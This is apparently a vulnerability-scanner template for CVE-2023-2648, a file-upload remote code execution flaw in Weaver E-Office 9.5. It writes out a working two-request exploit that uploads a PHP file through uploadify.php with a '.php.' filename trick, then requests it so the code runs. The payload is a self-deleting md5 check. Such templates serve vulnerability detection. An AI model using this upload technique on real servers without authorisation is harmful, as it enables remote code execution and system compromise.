Weaver E-Office 9.5 - Remote Code Execution

id: CVE-2023-2648

info:
  name: Weaver E-Office 9.5 - Remote Code Execution
  author: ritikchaddha
  severity: critical
  description: |
    A vulnerability was found in Weaver E-Office 9.5. It has been classified as critical. This affects an unknown part of the file /inc/jquery/uploadify/uploadify.php. The manipulation of the argument Filedata leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-228777 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Apply the latest security patch or upgrade to a patched version of Weaver E-Office.
  reference:
    - https://github.com/sunyixuan1228/cve/blob/main/weaver.md
    - https://nvd.nist.gov/vuln/detail/CVE-2023-2648
    - https://vuldb.com/?ctiid.228777
    - https://vuldb.com/?id.228777
    - https://github.com/bingtangbanli/cve-2023-2523-and-cve-2023-2648
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-2648
    cwe-id: CWE-434
    epss-score: 0.08638
    epss-percentile: 0.94483
    cpe: cpe:2.3:a:weaver:e-office:9.5:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: weaver
    product: e-office
    fofa-query:
      - app="泛微-EOffice"
      - app="泛微-eoffice"
  tags: cve2023,cve,weaver,eoffice,ecology,fileupload,rce,intrusive
variables:
  file: '{{rand_base(5, "abc")}}'
  string: "CVE-2023-2648"

http:
  - raw:
      - |
        POST /inc/jquery/uploadify/uploadify.php  HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

        ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
        Content-Disposition: form-data; name="Filedata"; filename="{{file}}.php."
        Content-Type: image/jpeg

        <?php echo md5("{{string}}");unlink(__FILE__);?>
        ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
      - |
        POST /attachment/{{name}}/{{file}}.php  HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - '{{md5(string)}}'

      - type: status
        part: body_2
        status:
          - 200

    extractors:
      - type: regex
        name: name
        part: body
        group: 1
        regex:
          - "([0-9]+)"
        internal: true
# digest: 4b0a00483046022100a44e0179362f362e905d1f609ac0e6b82953168cbcaa131defd1fd0d955a9ea4022100a1cebf6f55d89a80c2c0827b351c7ae189a38b42c694d472df9df4d44d960929:922c64590222798bb761d5b6d8e72950